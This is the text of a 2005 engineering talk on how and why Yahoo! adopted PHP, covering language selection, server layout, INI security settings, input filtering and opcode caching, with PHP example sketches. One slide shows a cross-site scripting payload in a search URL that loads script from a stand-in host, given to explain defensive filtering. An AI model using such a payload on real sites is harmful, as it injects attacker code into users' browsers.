PHP at Yahoo!
http://public.yahoo.com/~radwin/

Michael J. Radwin
October 20, 2005




Outline

• Yahoo!, as seen by an engineer
• Choosing PHP in 2002
• PHP architecture at Yahoo!


The Internet’s most trafficked site


25 countries, 13 languages


Yahoo! by the Numbers

• 411M unique visitors per month
• 191M active registered users
• 11.4M fee-paying customers
• 3.4B average daily pageviews

October 2005


Engineering Values

1. Security & Privacy
   – We must protect our customers’ information
2. High Availability
   – If the site is offline, we’re missing the opportunity to serve our customers
3. Performance
   – We serve billions of pageviews a day
4. Flexibility & Innovation
   – Customize site for each market
   – Rapid development of new features


From Proprietary to Open Source

[Figure: timeline from 1994 to 2005 with three rows: Web Server (“Filo Server”, Apache), Web Language (yScript), DB (Flat Files)]


Choosing a Language
How and Why We Selected PHP


Choosing PHP: brief history

• October 2001: 3 proprietary languages
  – Costly to continue to maintain each
  – Limited features (no subroutines!)
• Committee began researching
  – Compare features, performance
  – Build vs. Buy vs. Open Source
• PHP selected May 2002


Ideal Language Criteria

1. High performance
2. Robust, sand-boxed
3. Language features
   • Loops, conditionals
   • Complex data-types
4. C/C++ extensions
5. Runs on FreeBSD
8. Interpreted or dynamically compiled
9. i18n support
10. Clean separation of presentation/content/app semantics
11. Low training costs
12. Doesn’t require CS degree to use


Top 10 Language Choices

[Figure: the candidate languages, including mod_include, XSLT, and yScript]


Performance: Requests

[Chart: Requests/sec. Y-axis: req/s, 0 to 350. X-axis: concurrent requests, 25 to 500. Series: PHP, YSP, HF2k, mod_perl, yScript, and Network max.]


Performance: Memory

[Chart: Active Virtual Memory. Y-axis: kbytes active, 0 to 1,000,000. X-axis: concurrent requests, 25 to 500. Series: PHP, YSP, HF2k, mod_perl, yScript.]


Why we picked PHP

1. Designed for web scripting
2. High performance
3. Large, Open Source community
   • Documentation, easy to hire developers
4. “Code-in-HTML” paradigm
     <html>
     <?php echo "Hello World"; ?>
     </html>
5. Integration, libraries, extensibility
6. Tools: IDE, debugger, profiler
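
A slightly larger sketch of the “Code-in-HTML” paradigm than the Hello World above: the markup stays markup, and PHP appears only where a value or a loop is needed. The function name render_feature_list() and the sample data are illustrative assumptions, not taken from the talk.

```php
<?php
// Render a list with HTML as the host document and PHP embedded in it.
// render_feature_list() is a hypothetical helper used only for this sketch.
function render_feature_list(array $features)
{
    ob_start(); // capture the template output so it can be returned as a string
?>
<ul>
<?php foreach ($features as $feature): ?>
  <li><?php echo htmlspecialchars($feature); ?></li>
<?php endforeach; ?>
</ul>
<?php
    return ob_get_clean();
}

// Sample data is made up for illustration.
echo "<html>\n", render_feature_list(array('Web scripting', 'High performance')), "</html>\n";
```

The alternative loop syntax (foreach ... endforeach) is used because it tends to read better than braces when the loop body is mostly HTML.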


PHP at Yahoo! Today


Yahoo!’s Development Methodology

• Server Architecture
• File Layout
• Dependency Management
• Security
• Performance
• Globalization


Server Architecture

[Diagram labels: Load Balancer; Web Server (Apache, Scripts), drawn three times; User Profile Server; Ad Server; Web Services]


File Layout

• HTML Templates (95% HTML, 5% PHP)
  – /usr/local/share/htdocs/*.php
• Template Helpers (50% HTML, 50% PHP)
  – /usr/local/share/htdocs/*.inc
• Business Logic (0% HTML, 100% PHP)
  – /usr/local/share/pear/*.inc
• C/C++ Core Code (0% HTML, 0% PHP)
  – Data access, Networking, Crypto
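
The layering can be sketched in a single file. In the layout above each part would live in its own file and be pulled in with require_once; the function names news_get_headlines() and headline_link() and the sample stories are hypothetical, chosen only to show which layer is allowed to contain HTML.

```php
<?php
// Business logic layer: all PHP, no HTML.
// Would live under /usr/local/share/pear/*.inc. Hypothetical function and data.
function news_get_headlines()
{
    return array(
        array('title' => 'PHP selected', 'url' => '/story/1'),
        array('title' => 'Ampersands & more', 'url' => '/story/2'),
    );
}

// Template helper layer: a mix of HTML and PHP.
// Would live under /usr/local/share/htdocs/*.inc. Hypothetical function.
function headline_link(array $story)
{
    return '<a href="' . htmlspecialchars($story['url']) . '">'
         . htmlspecialchars($story['title']) . '</a>';
}

// HTML template layer: mostly HTML with a little PHP.
// Would live under /usr/local/share/htdocs/*.php.
?>
<html>
<body>
<ul>
<?php foreach (news_get_headlines() as $story): ?>
  <li><?php echo headline_link($story); ?></li>
<?php endforeach; ?>
</ul>
</body>
</html>
```

Keeping escaping in the helper means the template never has to decide how a value is encoded.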


Dependency Management

• Base PHP package depends only on XML parser
    ./configure --disable-all
• Self-Contained Extensions
  – mysql, dba, curl, ldap, pcre, gd, iconv
  – To enable
    1. Install /usr/local/lib/php/20020429/mysql.so
    2. Add “extension = mysql.so” to php.ini
  – Avoids unnecessary dependencies
  – Smaller Apache memory footprint
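
Because each extension is installed separately, a script cannot assume one is present. A minimal sketch of a startup check, using PHP's extension_loaded(); the helper name missing_extensions() is an assumption made for this example.

```php
<?php
// Return the names from $required that are not loaded in this PHP process.
// missing_extensions() is a hypothetical helper, not part of PHP.
function missing_extensions(array $required)
{
    $missing = array();
    foreach ($required as $name) {
        if (!extension_loaded($name)) {
            $missing[] = $name;
        }
    }
    return $missing;
}

// The extension names come from the slide; which ones are present
// depends entirely on the local install and php.ini.
$wanted  = array('mysql', 'dba', 'curl', 'ldap', 'pcre', 'gd', 'iconv');
$missing = missing_extensions($wanted);
echo 'Missing extensions: ', ($missing ? implode(', ', $missing) : 'none'), "\n";
```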


Security: INI Settings

• open_basedir
  – Insurance against /etc/passwd exploits
• allow_url_fopen = Off
  – Use libcurl extension instead
  – Avoid open proxy exploits
• display_errors = Off
  – However, log_errors = On
• safe_mode = Off
  – Intended for shared hosting environment
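
One way to confirm that a server actually runs with these settings is to read them back with ini_get(). The sketch below is an assumption about how such a check might look; ini_flag_is_on() and audit_ini() are hypothetical helpers. safe_mode is left out because later PHP versions removed that directive.

```php
<?php
// Interpret an ini_get() result as a boolean flag.
// ini_get() returns strings such as "1", "On", "", "0", "Off", or false.
// display_errors may also be "stdout" or "stderr", both of which mean on.
function ini_flag_is_on($value)
{
    $on = array('1', 'on', 'yes', 'true', 'stdout', 'stderr');
    return in_array(strtolower(trim((string) $value)), $on, true);
}

// Compare boolean INI directives against expected states.
// $expected maps directive name => true (On) or false (Off).
function audit_ini(array $expected)
{
    $problems = array();
    foreach ($expected as $name => $shouldBeOn) {
        if (ini_flag_is_on(ini_get($name)) !== $shouldBeOn) {
            $problems[] = $name . ' should be ' . ($shouldBeOn ? 'On' : 'Off');
        }
    }
    return $problems;
}

$problems = audit_ini(array(
    'allow_url_fopen' => false,
    'display_errors'  => false,
    'log_errors'      => true,
));
// open_basedir holds a path list rather than a flag, so only check that it is set.
if ((string) ini_get('open_basedir') === '') {
    $problems[] = 'open_basedir is not set';
}
echo $problems ? implode("\n", $problems) . "\n" : "INI settings match\n";
```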


Security: Input Filtering

http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js>

• Cross Site Scripting (XSS) most common attack
  – Also “SQL Injection”
• Normal approach
  – strip_tags()
  – mysqli_escape_string()
  – Examine every line of code
  – Tedious and error-prone
• Use input_filter hook
  – Sanitize all user-submitted data
  – GET/POST/Cookie
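
The input_filter hook runs inside the PHP engine, before any script sees the request. The sketch below is only a userland approximation of the same idea, filtering every GET/POST/Cookie value in one place instead of at each use. sanitize_input() is a hypothetical name, and the choice of strip_tags() plus htmlspecialchars() is an assumption, not the filter Yahoo! used.

```php
<?php
// Userland imitation of filtering all request data in one place.
// sanitize_input() is a hypothetical helper for this sketch.
function sanitize_input($value)
{
    if (is_array($value)) {
        // Request values can be nested, e.g. ?tags[]=a&tags[]=b
        return array_map('sanitize_input', $value);
    }
    // Strip markup, then encode what is left for safe echoing into HTML.
    return htmlspecialchars(strip_tags((string) $value), ENT_QUOTES);
}

// Run once at the top of the request, before any other code reads input.
$_GET    = sanitize_input($_GET);
$_POST   = sanitize_input($_POST);
$_COOKIE = sanitize_input($_COOKIE);
```

This addresses the XSS case only; values that go into SQL still need escaping or bound parameters at the query.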


Performance: Opcode Caches

• Easiest performance boost
  – Cache parsed .php scripts in shared memory
  – Optimizations
  – No code modifications!
• Several products available
  – Zend Performance Suite
  – APC
  – Turck MMCache


Performance: PHP Extensions in C++

• PHP ships with 80 extensions written in C/C++
• Yahoo! develops its own proprietary extensions
  – Fast execution speed
  – Access to client libraries
• Longer development cycle
  – Edit, compile, link, debug
  – Manual memory management


Globalization: PHP Unicode

• Native Unicode support in 2006
• Collaborative effort
  – Andrei Zmievski (Yahoo!)
  – Andi Gutmans (Zend)
  – Many members of PHP Community

[Figure: logo graphic with the text “+ + ICU = 6”]
